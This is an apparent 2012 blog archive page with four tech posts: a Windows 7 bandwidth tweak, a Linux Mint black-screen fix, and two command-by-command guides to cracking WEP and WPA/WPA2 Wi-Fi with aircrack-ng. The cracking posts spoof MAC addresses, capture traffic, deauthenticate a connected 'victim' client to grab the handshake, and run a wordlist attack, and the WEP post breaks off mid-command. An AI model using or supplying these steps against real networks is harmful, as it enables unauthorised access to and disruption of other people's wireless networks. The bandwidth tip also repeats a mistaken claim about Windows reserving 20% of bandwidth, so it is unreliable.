Skip to main content

Posts

Showing posts from August, 2012

How to increase your bandwidth in Win 7

Exceptionally a tip for Win 7. Windows uses up to 20% of the bandwidth, but you can change this with the following steps. Run gpedit.msc ==> administrative settings ==>  network ==> qos packet scheduler ==> open LIMIT RESERVABLE BANDWIDTH ==> click on ENABLE and limit bandwidth to 0%. Restart. Thats it!

Linux Mint 13 - Black screen fix (live USB)

Recently I switched from Ubuntu to Linux Mint 13 on my HP mini netbook. Unfortunately I encountered a  'black-screen problem' similar to the one I already knew from Backtrack 5 ( http://ubuntu-skype.blogspot.co.at/2012/07/backtrack-5-black-screen-after-startx.html ). The solution was: press TAB add to the line  "..... ...... .... quiet splash "one of the following (depending on your chip set of your video card): radeon.modeset=1 i915.modeset=1 If that does not work for you try to add "driver=intel". E.g. quiet splash i915.modeset=1 driver=intel. I had success with that. Hope it works for you too!

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you. Requirements - Backtrack (or Linux with aircrack-ng installed) - Virtual machine (e.g. Vmware or Virtualbox) - USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode . It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box. Commands airmon-ng stop wlan0 ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 ifconfig wlan0 up airmon-ng start wlan0  ifconfig mon0 down macchanger -r (random mac) mon0 ifconfig mon0 up airodump-ng mon0 (scan for APs) Wait for a minute CTRL + C (stop scanning) Pick your own AP with WEP encryption airodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0 -w file, in which the data will be saved. —You need around 10k of data to successfully crack WEP— Open another console aireplay-ng -1 0 -a (BSS

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5)

What you need Backtrack (or Linux with aircrack-ng installed) Virtual machine (e.g. Vmware or Virtualbox) Password list USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H Alright, fire up the terminal. Commands airmon-ng airmon-ng start wlan0 ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up airodump-ng mon0 (let it scan for a minute) CTRL + C (stop) airodump-ng -c (channel) -w (filename. eg. wpa) —bssid (xx:xx:xx:xx:xx:xx) mon0   Now, we need to deauthenticate a user's pc currently on the network (mac) open another console aireplay-ng --deauth 1 (just one!) -e (ESSID) -c  (victim's mac) mon0 Wait for WPA handshake ==> airodump-ng —-all cracking can be done offline—- aircrack-ng -w (wordlist) file (eg. WPA-01.cap) this is the file from step 8 Note: Success of attack depends on whether your word-list contains the password or not. Video Any problems? Ask!